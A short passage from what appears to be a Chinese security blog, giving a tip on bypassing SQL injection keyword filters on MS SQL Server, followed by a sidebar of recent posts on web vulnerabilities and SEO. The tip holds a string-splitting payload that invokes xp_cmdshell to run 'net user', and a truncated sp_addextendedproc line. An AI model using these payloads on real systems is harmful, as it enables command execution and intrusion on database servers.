declare、xp_、sp_、select、update、insert等关键词被过滤了。幸好单引号没有过滤。 EXEC('ma'+'ster..x'+'p_cm'+'dsh'+'ell ''net user''') 当xp_被过滤了,declare也被过滤了。什么鸟关键字都被过滤了。试试下面的办法。 EXEC master.dbo.sp_addextendedproc 'abc','xplog7
- 添加新评论
- 阅读次数:
搜索内容
最近发表
- [09/05]WebCruiser - Web Vulnerability Scanner Enterprise Edition v2.3.1 下载
- [09/05]phpwind远程代码执行漏洞
- [09/04]麦包包SEM案例
- [09/04]天工开物简介
- [09/04]长尾关键词的优化技巧
- [09/04]网站流量下降需要检查的7个地方
- [09/04]搜索引擎决定排名其实只有两个因素
- [09/03]havij1.12
- [09/03]ecshop修改任意用户密码漏洞"的CSRF利用
- [09/02]新版Skype支持10人视频聊天
- [09/02]QQ旅游华丽上线
- [09/02]新网互联称遭黑客恶意攻击 已将事件通报警方
- [09/01]面对百度开放平台站长该何去何从
- [08/31]微软全系统建立隐藏账户漏洞
- [08/31]德州迈威孵化机研制中心
